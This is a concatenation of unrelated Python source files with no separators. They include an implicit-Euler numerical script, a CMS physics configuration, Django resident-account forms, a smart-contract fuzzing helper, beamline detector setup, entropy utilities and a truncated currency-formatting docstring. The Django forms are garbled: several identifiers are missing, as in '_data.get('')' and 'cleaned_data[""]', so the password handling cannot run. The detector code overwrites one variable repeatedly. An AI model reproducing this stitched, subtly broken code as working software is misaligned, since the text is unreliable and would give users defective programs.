o erro E2(t) := |x*-x|*100 # Obs: o *100 é utilizado para ver alguma diferença, # já que o metodo é bastante eficiente def erro_euler(solucao): erro = [] for i in range (len(solucao)): t = solucao[i,0] dif_abs = abs(solucao[i,1] - funcao_exata_euler(t))*100 if(i == 0): erro.extend([t, dif_abs]) else: erro = np.vstack((erro, [t,dif_abs])) return(erro) # Plota o grafico da solucao esperada, resolvida e do erro def plota_grafico(solucao): fig, (ax1,ax2, ax3) = plt.subplots(1,3,sharex='col', sharey='row') fig.suptitle('Comparacao do Esperado e do resolvido por Euler') ax1.set_title("Esperado") ax1.plot(t,x) ax2.plot(solucao[:, 0], solucao[:, 1], 'tab:orange') ax2.set_title("Resolvido por Euler") erro = erro_euler(solucao) ax3.plot(erro[:,0], erro[:,1], 'tab:green') ax3.set_title("Erro") plt.savefig("solucao_" +"euler_implicito" + ".jpg",bbox_inches='tight') print("Imagem Salva!") plt.show() # 4 plota_erro() calcula_R_rk4() # euler h = (3.0-1.1)/5000 solucao_euler = euler_implicito(1.1, 3.0, -8.79, h) plota_grafico(solucao_euler) ## import skeleton process from PhysicsTools.PatAlgos.patTemplate_cfg import * ## ------------------------------------------------------ # NOTE: you can use a bunch of core tools of PAT to # taylor your PAT configuration; for a few examples # uncomment the lines below ## ------------------------------------------------------ from PhysicsTools.PatAlgos.tools.coreTools import * ## remove MC matching from the default sequence # removeMCMatching(process, ['Muons']) # runOnData(process) ## remove certain objects from the default sequence # removeAllPATObjectsBut(process, ['Muons']) # removeSpecificPATObjects(process, ['Electrons', 'Muons', 'Taus']) process.load('EgammaAnalysis.ElectronTools.electronIdMVAProducer_cfi') process.mvaID = cms.Sequence( process.mvaTrigV0 + process.mvaTrigNoIPV0 + process.mvaNonTrigV0 ) #Electron ID process.patElectrons.electronIDSources = cms.PSet( #MVA mvaTrigV0 = cms.InputTag("mvaTrigV0"), mvaNonTrigV0 = cms.InputTag("mvaNonTrigV0"), mvaTrigNoIPV0 = cms.InputTag("mvaTrigNoIPV0"), ) #add pat conversions process.patConversions = cms.EDProducer("PATConversionProducer", # input collection #electronSource = cms.InputTag("gsfElectrons"), electronSource = cms.InputTag("cleanPatElectrons") # this should be your last selected electron collection name since currently index is used to match with electron later. We can fix this using reference pointer. , ) ## let it run process.p = cms.Path( process.mvaID + process.patDefaultSequence+ process.patConversions ) process.out.outputCommands +=[ # 'keep *_patConversions*_*_*' ] ## ------------------------------------------------------ # In addition you usually want to change the following # parameters: ## ------------------------------------------------------ # # process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions) # ## process.source.fileNames = [ ## '/store/mc/Summer12_DR53X/DYJetsToLL_M-50_TuneZ2Star_8TeV-madgraph-tarball/AODSIM/PU_S10_START53_V7A-v1/0001/FE4B9392-D8D3-E111-8789-0025B3E05D8C.root' ] ## (e.g. 'file:AOD.root') # ## # process.maxEvents.input = ... ## (e.g. -1 to run on all events) # ## # process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py) # ## # process.out.fileName = ... ## (e.g. 'myTuple.root') # ## # process.options.wantSummary = True ## (to suppress the long output at the end of the job) Setti7/itaipucontas/forms.py from django import forms from django.contrib.auth import ( password_validation, ) from django.contrib.sites.shortcuts import get_current_site from django.core.mail import send_mail from django.forms import widgets from django.template import loader from django.utils.encoding import force_bytes from django.utils.http import urlsafe_base64_encode from django.utils.translation import gettext_lazy as _ from django.contrib.auth.forms import UserCreationForm from contas.models import Residente, Visitante, Chacara from itaipu.settings import REGISTRATION_EMAIL class AssociarResidenteForm(forms.Form): token = forms.CharField(max_length=8) new_password1 = forms.CharField( label=_("New password"), widget=forms.PasswordInput, strip=False, help_text=password_validation.password_validators_help_text_html(), ) new_password2 = forms.CharField( label=_("New password confirmation"), strip=False, widget=forms.PasswordInput, ) email = forms.EmailField(max_length=254) field_order = ['token', 'email', 'new_password1', 'new_password2'] error_messages = { 'password_mismatch': _("The two password fields didn't match."), 'invalid_token': 'Esse token é inválido.', 'email_not_unique': "Esse email já está em uso.", 'account_already_activated': 'Esse token já foi utilizado.
    Caso tenha esquecido a senha, vá para a página de ' 'login e clique em "Esqueceu a senha?".', } email_template_name = 'contas/associar-residente-email.html' subject = 'Parque Itaipu - Ativação da Conta' def __init__(self, request, *args, **kwargs): self.request = request super().__init__(*args, **kwargs) def clean_email(self): email = self.cleaned_data['email'] if Residente.objects.filter(email=email).exists(): raise forms.ValidationError( self.error_messages['email_not_unique'], code='email_not_unique', ) return email def clean(self): cleaned_data = super().clean() # Token validation token = cleaned_data.get('token') qs = Residente.objects.filter(token=token) if not qs.exists(): error = forms.ValidationError( self.error_messages['invalid_token'], code='invalid_token', ) self.add_error('token', error) self.user = None else: self.user = qs[0] # Active user validation if self.user.is_active: error = forms.ValidationError( self.error_messages['account_already_activated'], code='account_already_activated', ) self.add_error('token', error) # Password validation password1 = _data.get('') password2 = _data.get('') if password1 and password2: if password1 != password2: error = forms.ValidationError( self.error_messages['password_mismatch'], code='password_mismatch', ) self.add_error('new_password2', error) password_validation.validate_password(password2, self.user) return cleaned_data def save(self, commit=True): password = self.cleaned_data[""] self.user.set_password(password) self.user.email = self.cleaned_data['email'] if commit: self.user.save() current_site = get_current_site(self.request) context = { 'email': self.user.email, 'domain': current_site.domain, 'site_name': current_site.name, 'email_uidb64': urlsafe_base64_encode(force_bytes(self.user.email)).decode(), 'user': self.user, 'token_uidb64': urlsafe_base64_encode(force_bytes(self.cleaned_data['token'])).decode(), 'protocol': 'https' if self.request.is_secure() else 'http', } body = loader.render_to_string(self.email_template_name, context) send_mail( subject=self.subject, message=None, html_message=body, from_email=REGISTRATION_EMAIL, recipient_list=[self.user.email] ) return self.user class EditarVisitanteForm(forms.ModelForm): # Editáveis data = forms.DateField(label='Data', input_formats=['%d/%m/%Y', '%Y-%m-%d'], widget=widgets.DateInput(format='%d/%m/%Y')) # Hidden form_id = forms.IntegerField(min_value=0, max_value=999999, widget=forms.HiddenInput) nomeres = forms.CharField(max_length=50, required=False) foto = forms.ImageField(required=False) class Meta: model = Visitante fields = ['nome', 'data', 'form_id', 'nomeres', 'foto'] def __init__(self, nomeres, *args, **kwargs): self.nomeres = nomeres super().__init__(*args, **kwargs) def save(self, commit=True): v = super().save(commit=False) nome = self.cleaned_data.get('nome') data = self.cleaned_data.get('data') foto = self.cleaned_data.get('foto') pk = self.cleaned_data.get('form_id') nomeres = self.nomeres v = Visitante.objects.get(pk=pk) if commit: v.nome = nome v.foto = foto v.data = data v.agendado = True v.nomeres = nomeres v.save() return v class NovoVisitanteForm(forms.ModelForm): # Editáveis data = forms.DateField(label='Data', input_formats=['%d/%m/%Y', '%Y-%m-%d'], widget=widgets.DateInput(format='%d/%m/%Y')) class Meta: model = Visitante fields = ['nome', 'data'] def __init__(self, user, *args, **kwargs): self.chacara = user.chacara self.nomeres = user.nome super().__init__(*args, **kwargs) def save(self, commit=True): v = super().save(commit=False) nome = self.cleaned_data.get('nome') data = self.cleaned_data.get('data') chacara = self.chacara nomeres = self.nomeres if commit: v = Visitante.objects.create(nome=nome, chacara=chacara, nomeres=nomeres, data=data, agendado=True) v.save() return v class EditarTelefoneForm(forms.ModelForm): class Meta: model = Chacara fields = ['telefone'] class EditarResidenteForm(forms.ModelForm): # Hidden form_id = forms.IntegerField(min_value=0, max_value=999999, widget=forms.HiddenInput) class Meta: model = Residente fields = ['nome', 'status', 'token', 'email', 'form_id'] class NovoResidenteForm(UserCreationForm): STATUS_CHOICES = ( ('P', 'Proprietário'), ('C', 'Caseiro'), ) status = forms.ChoiceField(choices=STATUS_CHOICES) class Meta: model = Residente fields = ['nome', 'status', 'email', 'password1', ''] def __init__(self, chac_id, status, *args, **kwargs): super().__init__(*args, **kwargs) self.chac_id = chac_id self.status = status if self._meta.model.USERNAME_FIELD in self.fields: self.fields[self._meta.model.USERNAME_FIELD].widget.attrs.update({'autofocus': True}) def clean_status(self): self.error_messages['caseiro_not_authorized'] = 'Caseiros só podem criar outros caseiros.' status = self.cleaned_data.get("status") if self.status == 'C' and status != 'C': raise forms.ValidationError( self.error_messages['caseiro_not_authorized'], code='caseiro_not_authorized', ) return status def save(self, commit=True): user = super().save(commit=False) user.set_password(self.cleaned_data[""]) user.chacara = self.chac_id user.is_active = True if commit: user.save() return usercouchdb/design_document.py from document import Document class DesignDocument(Document): def __init__(self, database, doc_id, rev): super(DesignDocument, self).__init__(database, '_design/{0}'.format(doc_id), rev) # -*- coding: utf-8 -*- class CheckRepo: def check_repository(self): # we must check the repository... pass class VersionManager: def __init__(self, check_repo=None): self.check_repo = check_repo def check_file(self, requirements): if not requirements: return 'this project has no package list' if self.check_repo: self.check_repo.check_repository() # -*- coding: utf-8 -*- # @Time : 2020/10/08 21:41:48 # @Author : RegiusQuant <> # @Project : Regius-AI # @File : metrics.py # @Description: 评估指标 from sklearn.metrics import ( mean_squared_error, mean_absolute_error, r2_score ) def calc_regression_metrics(y_true, y_pred): return { "RMSE": mean_squared_error(y_true, y_pred) ** 0.5, "MAE": mean_absolute_error(y_true, y_pred), "R2": r2_score(y_true, y_pred) } sunbeam891/Smart_contract_fuzzing #script0.3.3 # Format : python3 Test.py import os import sys #files = os.listdir(path) word = "contract" delim = " " words= [] path ="" commands = open ("Confuzzius_commands.sh","w") commands.write ("#!/bin/bash" + " \n") commands.write("cd /root/" + " \n") contractname = sys.argv[1] Contractfile = sys.argv[2] #add if else for different fuzzers for a variable that contains the directory containing the crowdsale folder #Remove build files for root, dirs, files in os.walk("/go/src/ilf/example/crowdsale"): print(files) for directory in dirs: if directory == "build": print(os.path.join(root, directory)) os.system ("rm -r "+ os.path.join(root, directory)) # Edit deploy js file with contract details for root, dirs, files in os.walk("/go/src/ilf/example/crowdsale"): for f in files: if f == "2_deploy_contracts.js": a_file= open(os.path.join(root, f),"r",encoding="utf-8") listoflines=a_file.readlines() print(listoflines) for i in range(0,len(listoflines)): #if line.find("deployer.deploy") != -1: if "var crowdsale " in listoflines[i]: listoflines[i]='var crowdsale = artifacts.require("{contractsname}");\n'.format(contractsname=contractname) print(listoflines) print(listoflines) b_file=open(os.path.join(root, f),"w",encoding="utf-8") b_file.writelines(listoflines) b_file.close() a_file.close() # Copy new contract and delete old contract for root2, dirs2, files2 in os.walk("/go/src/ilf/example/crowdsale/contracts"): for f in files2: if f == "Migrations.sol": path = root2 else: os.system ("rm " + os.path.join(root2, f)) for root3, dirs3, files3 in os.walk("/go/src/ilf/dataset"): for f in files3: if f == Contractfile: os.system ("cp " + os.path.join(root3, f) + " " + path)import hashlib import argparse def hashfile(afile, hasher, blocksize=65536): buf = afile.read(blocksize) while len(buf) > 0: hasher.update(buf) buf = afile.read(blocksize) return hasher.hexdigest() def main(): parser = argparse.ArgumentParser( prog = 'chksum', description = "Using SHA256 to calculate a checksum for one or more files", formatter_class=argparse.RawTextHelpFormatter ) parser.add_argument('fnames', metavar='fname', type=str, nargs='+', help="One or more filenames to calculate the checksum for") args = parser.parse_args() for fname in args.fnames: print "%s: %s" %(fname, hashfile(open(fname, 'rb'), hashlib.sha256())[:16]) """File containing abstract base class for datasets.""" import abc from contextlib import contextmanager from copy import copy from types import SimpleNamespace from typing import Callable, Dict, List, Mapping, Optional, Sequence, Union import cytoolz as tz import numpy as np import pandas as pd import pyarrow as pa from datasets.arrow_dataset import DatasetInfoMixin from robustnessgym.core.tools import recmerge Example = Dict Batch = Dict[str, List] class AbstractDataset( abc.ABC, DatasetInfoMixin, ): """An abstract dataset class.""" all_columns: Optional[List[str]] visible_columns: Optional[List[str]] visible_rows: Optional[np.ndarray] _data: Union[Dict[str, List], pd.DataFrame, pa.Table] def __init__(self, *args, **kwargs): super(AbstractDataset, self).__init__(*args, **kwargs) def __repr__(self): return f"RG{self.__class__.__name__}" f"(num_rows: {self.num_rows})" def __len__(self): # If only a subset of rows are visible if self.visible_rows is not None: return len(self.visible_rows) # If there are columns, len of any column if self.column_names: return len(self._data[self.column_names[0]]) return 0 @property def column_names(self): """Column names in the dataset.""" return self.all_columns @property def columns(self): """Column names in the dataset.""" return self.column_names @property def num_rows(self): """Number of rows in the dataset.""" return len(self) @property def shape(self): """Shape of the dataset (num_rows, num_columns).""" return self.num_rows, len(self.columns) @classmethod def _assert_columns_all_equal_length(cls, batch: Batch): """Check that all columns have the same length so that the data is tabular.""" assert cls._columns_all_equal_length( batch ), "All columns must have equal length." @classmethod def _columns_all_equal_length(cls, batch: Batch): """Check that all columns have the same length so that the data is tabular.""" if len(set([len(v) for k, v in batch.items()])) == 1: return True return False def _check_columns_exist(self, columns: List[str]): """Check that every column in `columns` exists.""" for col in columns: assert col in self.all_columns, f"{col} is not a valid column." @abc.abstractmethod def _set_features(self): """Set the features of the dataset.""" raise NotImplementedError def _initialize_state(self): """Dataset state initialization.""" # Show all columns by default self.visible_columns = copy(self.all_columns) # Show all rows by default self.visible_rows = None # Set the features self._set_features() @abc.abstractmethod def add_column(self, column: str, values: List): """Add a column to the dataset.""" raise NotImplementedError def set_visible_rows(self, indices: Optional[Sequence]): """Set the visible rows in the dataset.""" if indices is None: self.visible_rows = None else: if len(indices): assert min(indices) >= 0 and max(indices) < len(self), ( f"Ensure min index {min(indices)} >= 0 and " f"max index {max(indices)} < {len(self)}." ) if self.visible_rows is not None: self.visible_rows = self.visible_rows[np.array(indices, dtype=int)] else: self.visible_rows = np.array(indices, dtype=int) def reset_visible_rows(self): """Reset to make all rows visible.""" self.visible_rows = None @contextmanager def format(self, columns: List[str] = None): """Context where only `columns` will be visible.""" # Get the current format current_format = self.get_format() if columns: # View only `columns` self.set_format(columns) else: # Use all columns self.set_format(self.column_names) try: yield finally: # Reset the format back self.set_format(current_format) def get_format(self) -> List[str]: """Get the dataset format.""" return self.visible_columns def set_format(self, columns: List[str]): """Set the dataset format. Only `columns` are visible after set_format is invoked. """ # Check that the columns exist self._check_columns_exist(columns) # Set visible columns self.visible_columns = columns def reset_format(self): """Reset the dataset format. All columns are visible. """ # All columns are visible self.visible_columns = self.all_columns def batch(self, batch_size: int = 32, drop_last_batch: bool = False): """Batch the dataset. Args: batch_size: integer batch size drop_last_batch: drop the last batch if its smaller than batch_size Returns: batches of data """ for i in range(0, len(self), batch_size): if drop_last_batch and i + batch_size > len(self): continue yield self[i : i + batch_size] @classmethod def from_batch(cls, batch: Batch): """Create an AbstractDataset from a batch.""" return cls(batch) @classmethod def from_batches(cls, batches: List[Batch]): """Create an AbstractDataset from a list of batches.""" return cls.from_batch( tz.merge_with(tz.compose(list, tz.concat), *batches), ) def _example_or_batch_to_batch( self, example_or_batch: Union[Example, Batch] ) -> Batch: # Check if example_or_batch is a batch is_batch = all( [isinstance(v, List) for v in example_or_batch.values()] ) and self._columns_all_equal_length(example_or_batch) # Convert to a batch if not if not is_batch: batch = {k: [v] for k, v in example_or_batch.items()} else: batch = example_or_batch return batch @classmethod def _merge_batch_and_output(cls, batch: Batch, output: Batch): """Merge an output during .map() into a batch.""" combined = batch for k in output.keys(): if k not in batch: combined[k] = output[k] else: if isinstance(batch[k][0], dict) and isinstance(output[k][0], dict): combined[k] = [ recmerge(b_i, o_i) for b_i, o_i in zip(batch[k], output[k]) ] else: combined[k] = output[k] return combined @classmethod def _mask_batch(cls, batch: Batch, boolean_mask: List[bool]): """Remove elements in `batch` that are masked by `boolean_mask`.""" return { k: [e for i, e in enumerate(v) if boolean_mask[i]] for k, v in batch.items() } def _inspect_function( self, function: Callable, with_indices: bool = False, batched: bool = False, ) -> SimpleNamespace: # Initialize variables to track no_output = dict_output = bool_output = list_output = False # If dict_output = True and `function` is used for updating the dataset # useful to know if any existing column is modified updates_existing_column = True existing_columns_updated = [] # Run the function to test it if batched: if with_indices: output = function(self[:2], range(2)) else: output = function(self[:2]) else: if with_indices: output = function(self[0], 0) else: output = function(self[0]) if isinstance(output, Mapping): # `function` returns a dict output dict_output = True # Set of columns that are updated existing_columns_updated = set(self.all_columns).intersection( set(output.keys()) ) # Check if `function` updates an existing column if len(existing_columns_updated) == 0: updates_existing_column = False elif output is None: # `function` returns None no_output = True elif isinstance(output, bool): # `function` returns a bool bool_output = True elif isinstance(output, list): # `function` returns a list list_output = True if batched and isinstance(output[0], bool): # `function` returns a bool per example bool_output = True return SimpleNamespace( dict_output=dict_output, no_output=no_output, bool_output=bool_output, list_output=list_output, updates_existing_column=updates_existing_column, existing_columns_updated=existing_columns_updated, ) @abc.abstractmethod def append( self, example_or_batch: Union[Example, Batch], ) -> None: """Append a batch of data to the dataset. `batch` must have the same columns as the dataset (regardless of what columns are visible). """ raise NotImplementedError dependencies.py def show_dependencies(): print('''requests countryinfo wikipedia pyttsx3 datetime ephem translate webbrowser pyperclip pillow''') print(f'Loading {__file__}') from ophyd import ( Component as Cpt, ADComponent, Device, PseudoPositioner, EpicsSignal, EpicsSignalRO, EpicsMotor, ROIPlugin, ImagePlugin, TransformPlugin, SingleTrigger, PilatusDetector, OverlayPlugin, FilePlugin) from ophyd.areadetector.filestore_mixins import FileStoreTIFFIterativeWrite from ophyd.areadetector.cam import PilatusDetectorCam from ophyd.areadetector.detectors import PilatusDetector from ophyd.areadetector.base import EpicsSignalWithRBV as SignalWithRBV from ophyd.utils import set_and_wait from databroker.assets.handlers_base import HandlerBase import os import bluesky.plans as bp import time from nslsii.ad33 import StatsPluginV33 from nslsii.ad33 import SingleTriggerV33 import pandas as pds class PilatusDetectorCamV33(PilatusDetectorCam): '''This is used to update the Pilatus to AD33.''' wait_for_plugins = Cpt(EpicsSignal, 'WaitForPlugins', string=True, kind='config') def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.stage_sigs['wait_for_plugins'] = 'Yes' def ensure_nonblocking(self): self.stage_sigs['wait_for_plugins'] = 'Yes' for c in self.parent.component_names: cpt = getattr(self.parent, c) if cpt is self: continue if hasattr(cpt, 'ensure_nonblocking'): cpt.ensure_nonblocking() file_path = Cpt(SignalWithRBV, 'FilePath', string=True) file_name = Cpt(SignalWithRBV, 'FileName', string=True) file_template = Cpt(SignalWithRBV, 'FileName', string=True) file_number = Cpt(SignalWithRBV, 'FileNumber') class PilatusDetector(PilatusDetector): cam = Cpt(PilatusDetectorCamV33, 'cam1:') class TIFFPluginWithFileStore(TIFFPlugin, FileStoreTIFFIterativeWrite): ... class Pilatus(SingleTriggerV33, PilatusDetector): tiff = Cpt(TIFFPluginWithFileStore, suffix="TIFF1:", #write_path_template="/GPFS/xf12id1/data/PLACEHOLDER", # override this on instances using instance.tiff.write_file_path write_path_template="/ramdisk/PLACEHOLDER", root='/') roi1 = Cpt(ROIPlugin, 'ROI1:') roi2 = Cpt(ROIPlugin, 'ROI2:') roi3 = Cpt(ROIPlugin, 'ROI3:') roi4 = Cpt(ROIPlugin, 'ROI4:') stats1 = Cpt(StatsPluginV33, 'Stats1:', read_attrs=['total']) stats2 = Cpt(StatsPluginV33, 'Stats2:', read_attrs=['total']) stats3 = Cpt(StatsPluginV33, 'Stats3:', read_attrs=['total']) stats4 = Cpt(StatsPluginV33, 'Stats4:', read_attrs=['total']) over1 = Cpt(OverlayPlugin, 'Over1:') trans1 = Cpt(TransformPlugin, 'Trans1:') threshold = Cpt(EpicsSignal, 'cam1:ThresholdEnergy') energy = Cpt(EpicsSignal, 'cam1:Energy') gain = Cpt(EpicsSignal, 'cam1:GainMenu') apply = Cpt(EpicsSignal, 'cam1:ThresholdApply') threshold_read = Cpt(EpicsSignal, 'cam1:ThresholdEnergy_RBV') energy_read = Cpt(EpicsSignal, 'cam1:Energy_RBV') gain_read = Cpt(EpicsSignal, 'cam1:GainMenu_RBV') apply_read = Cpt(EpicsSignal, 'cam1:ThresholdApply_RBV') def set_primary_roi(self, num): st = f'stats{num}' self.read_attrs = [st, 'tiff'] getattr(self, st).kind = 'hinted' def apply_threshold(self, energy=16.1, threshold=8.0, gain='autog'): if 1.5 < energy < 24: yield from bps.mv(self.energy, energy) else: raise ValueError("The energy range for Pilatus is 1.5 to 24 keV. The entered value is {}".format(energy)) if 1.5 < threshold < 24: yield from bps.mv(self.threshold, threshold) else: raise ValueError("The threshold range for Pilatus is 1.5 to 24 keV. The entered value is {}".format(threshold)) #That will need to be checked and tested if gain == 'autog': yield from bps.mv(self.gain, 1) elif gain == 'uhighg': yield from bps.mv(self.gain, 3) else: raise ValueError("The gain used is unknown. It shoul be either autog or uhighg") yield from bps.mv(self.apply, 1) def read_threshold(self): return self.energy_read, self.threshold_read, self.gain_read def det_exposure_time(exp_t, meas_t=1): pil1M.cam.acquire_time.put(exp_t) pil1M.cam.acquire_period.put(exp_t+0.001) pil1M.cam.num_images.put(int(meas_t/exp_t)) pil300KW.cam.acquire_time.put(exp_t) pil300KW.cam.acquire_period.put(exp_t+0.001) pil300KW.cam.num_images.put(int(meas_t/exp_t)) pil900KW.cam.acquire_time.put(exp_t) pil900KW.cam.acquire_period.put(exp_t+0.001) pil900KW.cam.num_images.put(int(meas_t/exp_t)) rayonix.cam.acquire_time.put(exp_t) rayonix.cam.acquire_period.put(exp_t+0.01) rayonix.cam.num_images.put(int(meas_t/exp_t)) #See if amptek is connected try: amptek.mca.preset_real_time.put(exp_t) except: print('amptek disconnected') def det_next_file (n): pil1M.cam.file_number.put(n) pil300KW.cam.file_number.put(n) rayonix.cam.file_number.put(n) class FakeDetector(Device): acq_time = Cpt(Signal, value=10) _default_configuration_attrs = ('acq_time', ) _default_read_attrs = () def trigger(self): st = self.st = DeviceStatus(self) from threading import Timer self.t = Timer(self.acq_time.get(), st._finished) self.t.start() return st fd = FakeDetector(name='fd') ##################################################### #Pilatus 1M definition pil1M = Pilatus("XF:12IDC-ES:2{Det:1M}", name="pil1M") #, detector_id="SAXS") pil1M.set_primary_roi(1) pil1M.tiff.write_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' pil1M.tiff.read_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' # pil1M.tiff.write_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' # pil1M.tiff.read_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' pil1mroi1 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats1:Total_RBV', name='pil1mroi1') pil1mroi2 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats2:Total_RBV', name='pil1mroi2') pil1mroi3 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats3:Total_RBV', name='pil1mroi3') pil1mroi4 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats4:Total_RBV', name='pil1mroi4') pil1M.stats1.kind = 'hinted' pil1M.stats1.total.kind = 'hinted' pil1M.cam.num_images.kind = 'config' pil1M.cam.ensure_nonblocking() class PIL1MPositions(Device): x = Cpt(EpicsMotor, 'X}Mtr') y = Cpt(EpicsMotor, 'Y}Mtr') z = Cpt(EpicsMotor, 'Z}Mtr') pil1m_pos = PIL1MPositions('XF:12IDC-ES:2{Det:1M-Ax:', name='detector_saxs_pos') for detpos in [pil1m_pos]: detpos.configuration_attrs = detpos.read_attrs ##################################################### #Pilatus 300kw definition pil300KW = Pilatus("XF:12IDC-ES:2{Det:300KW}", name="pil300KW") #, detector_id="WAXS") pil300KW.set_primary_roi(1) pil300KW.tiff.write_path_template = '/nsls2/xf12id2/data/300KW/images/%Y/%m/%d/' pil300KW.tiff.read_path_template = '/nsls2/xf12id2/data/300KW/images/%Y/%m/%d/' # pil300KW.tiff.write_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' # pil300KW.tiff.read_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' pil300kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats1:Total_RBV', name='pil300kwroi1') pil300kwroi2 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats2:Total_RBV', name='pil300kwroi2') pil300kwroi3 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats3:Total_RBV', name='pil300kwroi3') pil300kwroi4 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats4:Total_RBV', name='pil300kwroi4') pil300KW.stats1.kind = 'hinted' pil300KW.stats1.total.kind = 'hinted' pil300KW.cam.num_images.kind = 'config' pil300KW.cam.ensure_nonblocking() ##################################################### #Pilatus 900KW definition pil900KW = Pilatus("XF:12IDC-ES:2{Det:900KW}", name="pil900KW") pil900KW.set_primary_roi(1) pil900KW.tiff.write_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' pil900KW.tiff.read_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' # pil900KW.tiff.write_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' # pil900KW.tiff.read_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats1:Total_RBV', name='pil900kwroi1') pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats2:Total_RBV', name='pil900kwroi2') pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats3:Total_RBV', name='pil900kwroi3') pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats4:Total_RBV', name='pil900kwroi4') pil900KW.stats1.kind = 'hinted' pil900KW.stats1.total.kind = 'hinted' pil900KW.cam.num_images.kind = 'config' pil900KW.cam.ensure_nonblocking() #"multi_count" plan is dedicated to the time resolved Pilatus runs when the number of images in area detector is more than 1 def multi_count(detectors, *args, **kwargs): delay = detectors[0].cam.num_images.get() * detectors[0].cam.acquire_time.get() + 1 yield from bp.count(detectors, *args, delay=delay, **kwargs) class WAXS(Device): arc = Cpt(EpicsMotor, 'WAXS:1-Ax:Arc}Mtr') bs_x = Cpt(EpicsMotor, 'MCS:1-Ax:5}Mtr') bs_y = Cpt(EpicsMotor, 'BS:WAXS-Ax:y}Mtr') def set(self, arc_value): st_arc = self.arc.set(arc_value) if self.arc.limits[0] <= arc_value <= 10.61: calc_value = self.calc_waxs_bsx(arc_value) elif 10.61 <= arc_value <=13: raise ValueError("The waxs detector cannot be moved to {} deg until the new beamstop is mounted".format(arc_value)) else: calc_value = -40 st_x = self.bs_x.set(calc_value) return st_arc & st_x def calc_waxs_bsx(self, arc_value): # bsx_pos =-20.92 + 264 * np.tan(np.deg2rad(arc_value)) bsx_pos = 13.8 + 252*np.tan(np.deg2rad(arc_value)) return bsx_pos waxs = WAXS('XF:12IDC-ES:2{', name='waxs') import numpy as np from scipy.stats import entropy from math import log, e import pandas as pd import timeit def entropy1(labels, base=None): value,counts = np.unique(labels, return_counts=True) return entropy(counts, base=base) def entropy2(labels, base=None): """ Computes entropy of label distribution. """ n_labels = len(labels) if n_labels <= 1: return 0 value,counts = np.unique(labels, return_counts=True) probs = counts / n_labels n_classes = np.count_nonzero(probs) if n_classes <= 1: return 0 ent = 0. # Compute entropy base = e if base is None else base for i in probs: ent -= i * log(i, base) return ent def entropy3(labels, base=None): vc = pd.Series(labels).value_counts(normalize=True, sort=False) base = e if base is None else base return -(vc * np.log(vc)/np.log(base)).sum() def entropy4(labels, base=None): value,counts = np.unique(labels, return_counts=True) norm_counts = counts / counts.sum() base = e if base is None else base return -(norm_counts * np.log(norm_counts)/np.log(base)).sum() labels = [1,3,5,2,3,5,3,2,1,3,4,5] print(entropy1(labels)) print(entropy2(labels)) print(entropy3(labels)) print(entropy4(labels))""" pricing.babel_numbers ~~~~~~~~~~~~~~~~ Custom patches babel.numbers with improved `format_currency` function. :copyright: (c) 2018 by . :license: MIT, see LICENSE for more details. """ import decimal import babel.numbers from babel.core import Locale from babel.numbers import NumberPattern as _NumberPattern from babel.numbers import LC_NUMERIC, number_re, UnknownCurrencyFormatError __all__ = ['format_currency'] def format_currency(number, currency, format=None, locale=LC_NUMERIC, currency_digits=True, format_type='standard', decimal_quantization=True): """Return formatted currency value. >>> format_currency(1099.98, 'USD', locale='en_US') u'$1,099.98' >>> format_currency(1099.98, 'USD', locale='es_CO') u'US$\\xa01.099,98' >>> format_currency(1099.98, 'EUR', locale='de_DE') u'1.099,98\\xa0\\u20ac' The format can also be specified explicitly. The currency is placed with the '¤' sign. As the sign gets repeated the format expands (¤ being the symbol, ¤¤ is the currency abbreviation and ¤¤¤ is the full name of the currency): >>> format_currency(1099.98, 'EUR', u'\xa4\xa4 #,##0.00', locale='en_US') u'EUR 1,099.98' >>> format_currency(1099.98, 'EUR', u'#,##0.00 \xa4\xa4\xa4', ... locale='en_US') u'1,099.98 euros' Currencies usually have a specific number of decimal digits. This function favours that information over the given format: >>> format_currency(1099.98, 'JPY', locale='en_US') u'\\xa51,100' >>> format_currency(1099.98, 'COP', u'#,##0.00', locale='es_ES') u'1.100' However, the number of decimal digits can be overriden from the currency information, by setting the last parameter to ``False``: >>> format_currency(1099.98, 'JPY', locale='en_US', currency_digits=False) u'\\xa51,099.98' >>> format_currency(1099.98, 'COP', u'#,##0.00', locale='es_ES', ... currency_digits=False) u'1.099,98' If a format is not specified the type of currency format to use from the locale can be specified: >>> format_currency(1099.98, 'EUR', locale='en_US', format_type='standard') u'\\u20ac1,099.98' When the given currency format type is not available, an exception is raised: >>> format_currency('1099.98', 'EUR', locale='root', format_type='unknown') Traceback (most recent call last): ... UnknownCurrencyFormatError: "'unknown' is not a known currency format type" By default the locale is allowed to truncate and round a high-precision number by forcing its format pattern onto the decimal part. You can bypass this behavior with the `decimal_quantization` parameter: >>> format_currency(1099.9876, 'USD', locale='en_US') u'$1,099.99' >>> format_currency(1099.9876, 'USD', locale='en_US', ... decimal_quantization=False) u'$1,099.9876' :param number: the number to format :param currency: the currency code :param format: the format string to use :param locale: the `Locale` object or locale identifier :param currency_digits: use the currency's natural number of decimal 